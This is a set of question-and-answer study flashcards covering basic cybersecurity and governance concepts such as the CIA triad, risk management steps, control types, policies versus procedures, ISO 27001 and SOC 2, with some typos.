Cybersecurity Concepts

What does “Confidentiality” mean?

Ensures that sensitive data is only accessible to authorized people, systems, or processes.

What is the purpose of Confidentiality?

To prevent unauthorized access—stopping unauthorized users from seeing, stealing, or altering private information.

How is Confidentiality maintained?

Through encryption, access controls, passwords, and data masking.

Give examples of Confidentiality measures.

• Encryption (protects files or emails)

• Access Control (restricts sensitive data)

• Data Masking (hides sensitive parts)

• Two-Factor Authentication

• NDAs (Non-Disclosure Agreements)

What does “Integrity” ensure?

That information remains accurate, unaltered, and protected from unauthorized modification.

What is the purpose of Integrity?

Protection from tampering or unauthorized data alteration.

What methods verify Integrity?

Checksums, Secure Hash Algorithms, and digital signatures.

Give examples of Integrity measures.

• Digital signatures on emails

• Database access control

• Checksums verifying software downloads

What does “Availability” ensure?

That systems, data, and resources are accessible to authorized users whenever needed.

What is the purpose of Availability?

Minimizing downtime and ensuring continuous access to resources.

What strategies ensure Availability?

Backup, redundancy, and failover systems.

What is Authentication?

The process of verifying the identity of a user, device, or system before granting access.

What are examples of Authentication?

asswords, biometrics (fingerprint, face scan), or security tokens.

What is Authorization?

Determining what a verified user is allowed to do (access rights, actions, services).

When does Authorization occur?

After authentication.

Who is the Controller in data privacy?

The entity that determines the purpose and means of processing personal data.

What is the first step in Risk Management?

Risk Identification — finding potential threats that could impact the organization.

What is the second step in Risk Management?

Risk Assessment — evaluating likelihood and impact of each identified risk.

What is Risk Analysis?

Evaluating identified risks to determine their potential impact and likelihood.

What are the two main risk analysis methods?

Qualitative and Quantitative.

Describe Qualitative Risk Analysis.

Uses subjective judgment (low, medium, high) based on expertise and brainstorming.

What is “Likelihood”?

The probability a risk will occur (likely, unlikely).

What is “Impact”?

The magnitude of damage caused by a risk (financial, reputational, operational).

What is “Risk Tolerance”?

The acceptable level of risk an organization is willing to take.

What are the four main risk treatment strategies?

Transfer, Accept, Avoid, and Mitigate.

What is Risk Transfer?

Shifting risk to a third party (e.g., insurance, outsourcing).

What is Risk Acceptance?

Acknowledging a risk without acting because it’s low-impact or low-probability.

What is Risk Mitigation?

Reducing likelihood or impact via controls (e.g., firewalls, anti-malware).

What is Risk Reporting?

Documenting and communicating risks, their status, and mitigation efforts to stakeholders.

Why is Risk Reporting important?

It helps decision-makers prioritize resources and actions for effective risk management.

What is Automating how does it relate to Third Party Risk Management?

Using technology to carry out tasks automatically without requiring human intervention.

Give an example of Automation

Using AI like machine learning to perform complex tasks that require human intelligence.

Types of Controls

Preventive, Detterent, Detective, Corrective, Compensating and Directive

What is incident response

Incident response is a structured approach to addressing and managing the aftermath of a cybersecurity incident

What is the definition of policies

Formal, high-level statements that define an organizations approach to security and set expectation for behavior and compliance

What is sthe purose of policies?

 Establish clear rules and responsibilities to protect assets, ensure regulatory compliance and mitigate risk

What is the definition of guidelines?

High-level recommendations that outline best practices and frameworks to follow for achieving security objectives

What is the purpose of guidelines?

Offer direction on how policies and procedures should be implemented to maintain consistent security practices across the organization

What is the definition of procedures?

Step by step isntructions for carrying out specific task to comply with standards and policies

What are standards

Detailed mandatory rules specifying uniform methods to enforce policies

What is Inherent risk

The risk before controls are in place

What is Residual risk

The remaining risk after controls are applied

What is ISO 27001

Internation standard for building an information security management system. Focuses on policies and risk treatments.

What is SOC 2

Auditing standard. Evaluates controls over secuirty, availability, integrity and confidentiality.